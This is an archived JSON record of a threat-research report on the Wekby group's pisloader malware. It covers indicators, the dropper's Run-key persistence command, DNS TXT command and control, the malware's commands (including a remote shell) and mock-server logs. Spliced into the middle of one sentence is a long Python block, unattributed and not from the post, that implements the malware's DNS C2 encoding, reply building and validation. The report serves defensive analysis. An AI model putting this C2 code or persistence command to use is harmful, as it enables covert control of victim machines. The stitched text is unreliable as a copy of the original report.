{
	"id": "eaade02c-a734-49c0-95e2-2769a7a0b4bd",
	"created_at": "2026-04-06T00:16:23.573232Z",
	"updated_at": "2026-04-10T03:27:54.078517Z",
	"deleted_at": null,
	"sha1_hash": "837a94aac33707f2cde501d7c9506902602ee2fd",
	"title": "New Wekby Attacks Use DNS Requests As Command and Control Mechanism",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 729038,
	"plain_text": "New Wekby Attacks Use DNS Requests As Command and Control\r\nMechanism\r\nBy Josh Grunzweig, Mike Scott, Bryan Lee\r\nPublished: 2016-05-24 · Archived: 2026-04-05 22:39:29 UTC\r\nWe have observed an attack led by the APT group Wekby targeting a US-based organization in recent weeks.\r\nWekby is a group that has been active for a number of years, targeting various industries such as healthcare,\r\ntelecommunications, aerospace, defense, and high tech. The group is known to leverage recently released exploits\r\nvery shortly after those exploits are available, such as in the case of HackingTeam’s Flash zero-day exploit.\r\nThe malware used by the Wekby group has ties to the HTTPBrowser malware family, and uses DNS requests as a\r\ncommand and control mechanism. Additionally, it uses various obfuscation techniques to thwart researchers\r\nduring analysis. Based on metadata seen in the discussed samples, Palo Alto Networks has named this malware\r\nfamily ‘pisloader’.\r\nInfrastructure\r\nThe pisloader malware family was delivered via HTTP from the following URL. At the time of writing, this URL\r\nwas still active.\r\nhttp://globalprint-us[.]com/proxy_plugin.exe \r\nOther samples hosted on this domain include the following:\r\nhttp://globalprint-us[.]com/proxy_web_plugin.exe \r\nMD5: E4968C8060EA017B5E5756C16B80B012\r\nSHA256: 8FFBB7A80EFA9EE79E996ABDE7A95CF8DC6F9A41F9026672A8DBD95539FEA82A\r\nSize: 126976 Bytes\r\nCompile Time: 2016-04-28 00:38:46 UTC\r\nThis discovered file was found to be an instance of the common Poison Ivy malware family with the following\r\nconfiguration data:\r\nCommand and Control Address: intranetwabcam[.]com\r\nCommand and Control Port: 80\r\nPassword: admin\r\nMutex: )!VoqA.I5\r\nThe domains witnessed in this attack were all registered very shortly prior to being used. 
The following domains\r\nhave been witnessed in this attack:\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 1 of 10\n\nAdditionally, the following IP resolutions have been observed.\r\nInitial Dropper\r\nThe following sample was discovered initially and is referenced in the subsequent analysis:\r\nMD5: E8D58AA76DD97536AC225949A2767E05\r\nSHA256: DA3261C332E72E4C1641CA0DE439AF280E064B224D950817A11922A8078B11F1\r\nSize: 126976 Bytes\r\nCompile Time: 2016-04-27 14:37:34 UTC\r\nThis particular file has the following metadata properties. The references to ‘pisload2’ led to the naming of this\r\nmalware family.\r\nFigure 1 pisloader dropper metadata\r\nThe initial dropper contains very simple code that is responsible for setting persistence via the Run registry key,\r\nand dropping and executing an embedded Windows executable. Limited obfuscation was encountered, where the\r\nauthors split up strings into smaller sub-strings and used ‘strcpy’ and ‘strcat’ calls to re-build them prior to use.\r\nThey also used this same technique to generate garbage strings that are never used. This is likely to deter detection\r\nand analysis of the sample. The following decompiled code demonstrates this. 
Comments have been added to\r\nshow the fully-generated strings.\r\nFigure 2 pisloader dropper building strings and setting persistence\r\nIn the above decompiled code, we see that the pisloader is generating the following string, which is eventually\r\nexecuted to set the Run registry key.\r\ncmd.exe /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v lsm /t reg_sz /d\r\n\"%appdata%\\lsm.exe\" /f\r\nThis particular command creates the value ‘lsm’ under the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key\r\nwith the data “%appdata%\\lsm.exe”. Because the value is written through cmd.exe and reg add rather than direct registry API calls, the full command line is visible to process-creation logging. After this key is set, the malware proceeds to decrypt two blobs of data\r\nwith a single-byte XOR key of 0x54. The resulting data is written to the %appdata%\\lsm.exe file path.\r\nAfter this file is written, the malware executes the newly written lsm.exe file, which contains the pisloader\r\npayload.\r\nPayload\r\nThe following sample was discovered and is referenced in the subsequent analysis:\r\nMD5: 07B9B62FB3B1C068837C188FEFBD5DE9\r\nSHA256: 456FFFC256422AD667CA023D694494881BAED1496A3067485D56ECC8FEFBFAEB\r\nSize: 102400 Bytes\r\nCompile Time: 2016-04-27 13:39:02 UTC\r\nThe payload is heavily obfuscated using a return-oriented programming (ROP) technique, as well as a number of\r\ngarbage assembly instructions. In the example below, code highlighted in red essentially serves no purpose other\r\nthan to deter reverse-engineering of the sample. This code can be treated as garbage and ignored. The entirety of\r\nthe function is highlighted in green, where two function offsets are pushed to the stack, followed by a return\r\ninstruction. This return instruction will point code execution first at the null function, which in turn will point code\r\nexecution to the ‘next_function’. 
This technique is used throughout the runtime of the payload, making static\r\nanalysis difficult.\r\nFigure 3 Obfuscated code witnessed in pisloader\r\nThe malware is actually quite simplistic once the obfuscation and garbage code are ignored. It will begin by\r\ngenerating a random 10-byte alpha-numeric header. The remaining data is base32-encoded, with padding\r\nremoved. This data will be used to populate a subdomain that will be used in a subsequent DNS request for a TXT\r\nrecord.\r\nThe use of DNS as a C2 protocol has historically not been widely adopted by malware authors. Notable\r\nexceptions include the following:\r\nFrameworkPOS\r\nC3PRO-RACCOON\r\nFeederBot\r\nMorto\r\nPlugX Variants\r\nThe use of DNS as a C2 allows pisloader to bypass certain security products that may not be inspecting this traffic\r\ncorrectly.\r\nFigure 4 DNS query for TXT record by malware\r\nThe pisloader sample will send a beacon periodically that is composed of a random 4-byte uppercase string that is\r\nused as the payload. An example of this can be found below:\r\nFigure 5 pisloader DNS beacon request\r\nThe malware expects various aspects of the DNS responses to be set in a specific way, or else pisloader will\r\nignore the DNS reply. The following DNS flags must be set. Should any additional flags be set, the response will\r\nbe ignored.\r\nResponse\r\nRecursion Desired\r\nRecursion Available\r\nThe ‘Questions’ field must be set to a value of 0x1. The ‘Answer Resource Records’ field must be set to a value of\r\n0x1. 
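The following Python is added here as a worked example; it is not code from the post and not Unit 42's mock DNS server. It puts both halves of the channel together: the encoding pisloader applies on each side (a 10-byte header followed by unpadded base32 in the query label, one ignored byte followed by base32 in the TXT reply) and the acceptance checks just listed, including the requirement that the echoed question name match the query. The 'C' prefix byte, the 25-byte chunk size (which produces the 50-character labels seen in the log), the treatment of the flag check as an exact comparison of the whole flags word against 0x8180 (opcode and rcode zero), and every function name are assumptions of this example; the sample labels and the ns1.logitech-usa.com name are taken from the post.

```python
import base64
import secrets
import string
import struct

# Added example for this page, not Unit 42 code.  Wire layout follows the post: victim queries
# carry a 10-byte random alphanumeric header followed by unpadded base32; C2 TXT replies are one
# ignored byte followed by base32.  The 'C' prefix and 25-byte chunking are inferred (assumption).
HEADER_LEN = 10
CMD_PREFIX = 'C'
TXT, IN = 16, 1
QR, RD, RA = 0x8000, 0x0100, 0x0080
EXPECTED_FLAGS = QR | RD | RA   # 0x8180: Response, RD and RA set, nothing else, opcode/rcode 0

def b32_nopad(data: bytes) -> str:
    return base64.b32encode(data).decode('ascii').rstrip('=')

def b32_decode_nopad(text: str) -> bytes:
    return base64.b32decode(text + '=' * (-len(text) % 8))   # restore the stripped padding

def encode_command(cmd: str) -> str:
    # C2 -> victim: TXT payload for one command (byte 0 is ignored by the malware)
    return CMD_PREFIX + b32_nopad(cmd.encode('ascii'))

def decode_command(txt: str) -> bytes:
    # victim side: skip byte 0, base32-decode the rest
    return b32_decode_nopad(txt[1:])

def encode_exfil(data: bytes, chunk: int = 25) -> list:
    # victim -> C2: one query label per chunk; 25 bytes -> 40 base32 chars -> 50-char label
    labels = []
    for i in range(0, len(data), chunk):
        header = ''.join(secrets.choice(string.ascii_uppercase + string.digits) for _ in range(HEADER_LEN))
        labels.append(header + b32_nopad(data[i:i + chunk]))
    return labels

def decode_exfil(labels) -> bytes:
    # mock-server side: drop each header, decode, join the chunks in arrival order
    return b''.join(b32_decode_nopad(label[HEADER_LEN:]) for label in labels)

def encode_name(name: str) -> bytes:
    out = bytearray()
    for label in name.strip('.').split('.'):
        out += bytes([len(label)]) + label.encode('ascii')
    return bytes(out) + bytes([0])

def build_txt_response(txid: int, qname: str, txt: str, flags: int = EXPECTED_FLAGS,
                       qdcount: int = 1, ancount: int = 1) -> bytes:
    # minimal uncompressed reply: header, one question, one TXT answer (TTL 60)
    name = encode_name(qname)
    rdata = bytes([len(txt)]) + txt.encode('ascii')
    return (struct.pack('>HHHHHH', txid, flags, qdcount, ancount, 0, 0)
            + name + struct.pack('>HH', TXT, IN)
            + name + struct.pack('>HHIH', TXT, IN, 60, len(rdata)) + rdata)

def parse_name(pkt: bytes, off: int):
    # read a name at off, following RFC 1035 compression pointers; return (name, next offset)
    labels, resume = [], None
    while True:
        n = pkt[off]
        if (n & 0xC0) == 0xC0:
            if resume is None:
                resume = off + 2
            off = ((n & 0x3F) << 8) | pkt[off + 1]
            continue
        off += 1
        if n == 0:
            break
        labels.append(pkt[off:off + n].decode('ascii'))
        off += n
    return '.'.join(labels), (off if resume is None else resume)

def accept_response(pkt: bytes, sent_qname: str):
    # the acceptance rules the post lists; returns the TXT string, or None when the
    # malware would ignore the reply
    _txid, flags, qd, an, _ns, _ar = struct.unpack('>HHHHHH', pkt[:12])
    if flags != EXPECTED_FLAGS or qd != 1 or an != 1:
        return None
    qname, off = parse_name(pkt, 12)
    if qname.lower() != sent_qname.lower():       # echoed question must match our query
        return None
    off += 4                                      # QTYPE, QCLASS
    _aname, off = parse_name(pkt, off)
    rtype, _rclass, _ttl, rdlen = struct.unpack('>HHIH', pkt[off:off + 10])
    off += 10
    if rtype != TXT or rdlen < 1:
        return None
    return pkt[off + 1:off + 1 + pkt[off]].decode('ascii')

# Query labels copied from the mock-server log in the post (the drive and sifo replies)
DRIVE_QUERY = 'UMAVMGAGD0IE5FY7CDHJOHYRB2LR6A'
SIFO_QUERIES = ['FUBWMGAGIANQ6TCNZSFYYTMLRRFYYTKMZGMM6VOSKOFVGEUTCW',
                'PGHRMGAGIBGJHEWSKPJNICAW2KN5ZWQICHOJ2W46TXMVUWOXJG',
                'MMAZMGAGI0N46TMLBRFQZTE']

if __name__ == '__main__':
    q = encode_exfil(b'XXXX')[0] + '.ns1.logitech-usa.com'   # beacon-style query name
    print(decode_command(accept_response(build_txt_response(1, q, encode_command('drive')), q)))
    print(decode_exfil([DRIVE_QUERY]), decode_exfil(SIFO_QUERIES))
```

Two points worth noting when reusing this as a detection or emulation aid: the validator follows compression pointers because a reply relayed through a recursive resolver usually compresses the answer name, and a check that only handled the uncompressed form would reject real traffic; and because the malware insists on Recursion Available, a mock server must set RA itself when it answers the victim directly rather than through a resolver.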
Additionally, the response query subdomain must match the original DNS request.\r\nThe remote command and control (C2) server is statically embedded within the malware. A single host,\r\n‘ns1.logitech-usa[.]com’, is found in this specific sample.\r\nThe C2 server will respond with a TXT record that is encoded similarly to the initial request. In the response, the\r\nfirst byte is ignored, and the remaining data is base32-encoded. An example of this can be found below.\r\nFigure 6 Example TXT response by C2 server\r\nThe following commands, with their descriptions, are supported by the malware:\r\nsifo – Collect victim system information\r\ndrive – List drives on victim machine\r\nlist – List file information for provided directory\r\nupload – Upload a file to the victim machine\r\nopen – Spawn a command shell\r\nSome examples of these commands being used can be seen below. A mock DNS server was used to generate the\r\ncommands and receive the resulting data.\r\nExample sending the ‘drive’ command:\r\n[+] Sending Command: drive | Encoded: CMRZGS5TF\r\n[+] Raw Data Received: UMAVMGAGD0IE5FY7CDHJOHYRB2LR6A\r\n[+] Decoded Data Received: A:\\|C:\\|D:\\|\r\nExample sending the ‘open’ command:\r\n[+] Sending Command: open | Encoded: CN5YGK3Q\r\n[+] Raw Data Received: ULCBMGAGCAJVUWG4TPONXWM5BAK5UW4ZDPO5ZSAW2WMVZHG2LP\r\n[+] Raw Data Received: ATABMGAGCBNYQDMLRRFY3TMMBRLUGQUQ3POB4XE2LHNB2CAKDD\r\n[+] Raw Data Received: HTPDMGAGCCFEQDEMBQHEQE22LDOJXXG33GOQQEG33SOBXXEYLU\r\n[+] Raw Data Received: BNJWMGAGCDNFXW4LRAEBAWY3BAOJUWO2DUOMQHEZLTMVZHMZLE\r\n[+] Raw Data Received: UARCMGAGCEFYGQUDIKIM5FYVLTMVZHGXCKN5ZWQICHOJ2W46TX\r\n[+] Raw Data Received: UJRAMGAGC0MVUWOXCEMVZWW5DPOA7A\r\n[+] Decoded Data Received: Microsoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\r\nC:\\Users\\Josh Grunzweig\\Desktop\u003e\r\nExample sending the ‘sifo’ command:\r\n[+] Sending Command: sifo | Encoded: CONUWM3Y\r\n[+] Raw Data Received: FUBWMGAGIANQ6TCNZSFYYTMLRRFYYTKMZGMM6VOSKOFVGEUTCW\r\n[+] Raw Data Received: PGHRMGAGIBGJHEWSKPJNICAW2KN5ZWQICHOJ2W46TXMVUWOXJG\r\n[+] Raw Data Received: MMAZMGAGI0N46TMLBRFQZTE\r\n[+] Decoded Data Received: l=172.16.1.153\u0026c=WIN-LJLV2NKIOKP [Josh Grunzweig]\u0026o=6,1,32\r\nExample listing the contents of the C:\\ drive:\r\n[+] Sending Command: list C:\\ | Encoded: CNRUXG5BAIM5FY\r\n[+] Raw Data Received: QKTUMGAGLAGB6CIUTFMN4WG3DFFZBGS3T4GIYDCNJPGAZS6MRW\r\n[+] Raw Data Received: EKNPMGAGL0EAYTIORUGA5DKN34GB6DEMS6\r\n[+] Raw Data Received: RKMAMGAGLAGF6GC5LUN5SXQZLDFZRGC5D4GIYDAOJPGA3C6MJQ\r\n[+] Raw Data Received: NMSIMGAGL0EAZDCORUGI5DEMD4GI2HYMZSLY\r\n[+] Raw Data Received: OHRWMGAGLAGB6EE33POR6DEMBRGUXTAMZPGI3CAMJWHIZDIORQ\r\n[+] Raw Data Received: DPDUMGAGL0GJ6DA7BSGJPA\r\n[+] Raw Data Received: WIKGMGAGLAGF6GE33PORWWO4T4GIYDCNBPGA3C6MRYEAYDAORS\r\n*Truncated*\r\n[+] Decoded Data Received: 0|$Recycle.Bin|2015/03/26 14:40:57|0|22^1|autoexec.bat|2009/06/10 21:42:20|24|32^0|Boot|2015/03/26 16:24:02|0|22^1|bootmgr|2014/06/28 00:21:34|391640|39^1|BOOTSECT.BAK|2015/03/26 16:35:39|8192|39^1|config.sys|2009/06/10 21:42:20|10|32^0|Documents and Settings|2009/07/14 04:53:55|0|9238^1|Example.log|2016/02/09 20:17:55|0|32^1|pagefile.sys|2016/04/25 14:09:20|1660411904|38^0|PerfLogs|2009/07/14 02:37:05|0|16^0|Program Files|2016/02/29 15:59:43|0|17^0|ProgramData|2016/02/02 17:28:04|0|8210^0|Python27|2016/02/25 16:39:37|0|16^0|Recovery|2015/03/26 14:39:57|0|8214^0|System Volume Information|2016/02/29 16:00:19|0|22^0|Users|2015/03/26 14:39:58|0|17^0|Windows|2016/02/12 10:20:21|0|16^^end^\r\nThe sifo command above uses the printf format string of ‘l=%s\u0026c=%s\u0026o=%s’. This is consistent with previous\r\nversions of HTTPBrowser, which is another malware family frequently used by the Wekby group.\r\nAdditionally, a number of the commands themselves, such as the ‘list’, ‘drive’, and ‘upload’ commands, are consistent\r\nwith HTTPBrowser. The formatted responses from these commands are also identical. A known HTTPBrowser\r\nsample was spotted with metadata similar to that of the discussed pisloader sample, which adds further credibility to the assessment that\r\npisloader is likely a variant of this malware family.\r\nAdditionally, the code used to generate these commands is available via GitHub.\r\nConclusion\r\nThe Wekby group continues to target various high profile organizations using sophisticated malware. The\r\npisloader malware family uses several uncommon techniques, such as DNS as a C2 protocol, as well as making\r\nuse of return-oriented programming and other anti-analysis tactics.\r\nPalo Alto Networks customers are protected against this threat in the following ways:\r\nWildFire correctly identifies all pisloader samples as malicious\r\nA pisloader AutoFocus tag has been created in order to track this malware family\r\nAll domains/IPs used in this attack have been flagged as malicious.\r\nAn IPS rule has been created to detect pisloader DNS traffic\r\nAppendix\r\nExternal 
Resources\r\nhttps://blog.anomali.com/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop\r\nhttp://www.volexity.com/blog/?p=158\r\nhttps://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage\r\nhttps://www.zscaler.com/blogs/research/chinese-cyber-espionage-apt-group-leveraging-recently-leaked-hacking-team-exploits-target-financial-services-firm\r\nhttps://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html\r\nSHA256 Hashes\r\nda3261c332e72e4c1641ca0de439af280e064b224d950817a11922a8078b11f1\r\n930772d6af8f43f62ea78092914fa8d6b03e8e3360dd4678eec1a3dda17206ed\r\n6852ba95720af64809995e04f4818517ca1bd650bc42ea86d9adfdb018d6b274\r\n9200f80c08b21ebae065141f0367f9c88f8fed896b0b4af9ec30fc98c606129b\r\n4d62caef1ca8f4f9aead7823c95228a52852a1145ca6aaa58ad8493e042aed16\r\n1b341dab023de64598d80456349db146aafe9b9e2ec24490c7d0ac881cecc094\r\n456fffc256422ad667ca023d694494881baed1496a3067485d56ecc8fefbfaeb\r\nDomains\r\nns1.logitech-usa[.]com\r\nglobalprint-us[.]com\r\nintranetwabcam[.]com\r\nlogin.access-mail[.]com\r\nglb.it-desktop[.]com\r\nlocal.it-desktop[.]com\r\nhi.getgo2[.]com\r\nSource: https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/"
	],
	"report_names": [
		"unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism"
	],
	"threat_actors": [
		{
			"id": "17b92337-ca5f-48bb-926b-c93b5e5678a4",
			"created_at": "2022-10-25T16:07:23.333316Z",
			"updated_at": "2026-04-10T02:00:04.546474Z",
			"deleted_at": null,
			"main_name": "APT 18",
			"aliases": [
				"APT 18",
				"Dynamite Panda",
				"G0026",
				"Red Wraith",
				"SILVERVIPER",
				"Satin Typhoon",
				"Scandium",
				"TG-0416",
				"Wekby"
			],
			"source_name": "ETDA:APT 18",
			"tools": [
				"AngryRebel",
				"AtNow",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HttpBrowser RAT",
				"HttpDump",
				"Moudour",
				"Mydoor",
				"PCRat",
				"Pisloader",
				"QUICKBALL",
				"Roseam",
				"StickyFingers",
				"Token Control",
				"TokenControl",
				"hcdLoader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a3687241-9876-477b-aa13-a7c368ffda58",
			"created_at": "2022-10-25T16:07:24.496902Z",
			"updated_at": "2026-04-10T02:00:05.010744Z",
			"deleted_at": null,
			"main_name": "Hacking Team",
			"aliases": [],
			"source_name": "ETDA:Hacking Team",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c8aefee7-fb57-409b-857e-23e986cb4a56",
			"created_at": "2023-01-06T13:46:38.285223Z",
			"updated_at": "2026-04-10T02:00:02.910756Z",
			"deleted_at": null,
			"main_name": "APT18",
			"aliases": [
				"SCANDIUM",
				"PLA Navy",
				"Wekby",
				"G0026",
				"Satin Typhoon",
				"DYNAMITE PANDA",
				"TG-0416"
			],
			"source_name": "MISPGALAXY:APT18",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e90c06e4-e3e0-4f46-a3b5-17b84b31da62",
			"created_at": "2023-01-06T13:46:39.018236Z",
			"updated_at": "2026-04-10T02:00:03.183123Z",
			"deleted_at": null,
			"main_name": "Hacking Team",
			"aliases": [],
			"source_name": "MISPGALAXY:Hacking Team",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434583,
	"ts_updated_at": 1775791674,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/837a94aac33707f2cde501d7c9506902602ee2fd.pdf",
		"text": "https://archive.orkl.eu/837a94aac33707f2cde501d7c9506902602ee2fd.txt",
		"img": "https://archive.orkl.eu/837a94aac33707f2cde501d7c9506902602ee2fd.jpg"
	}
}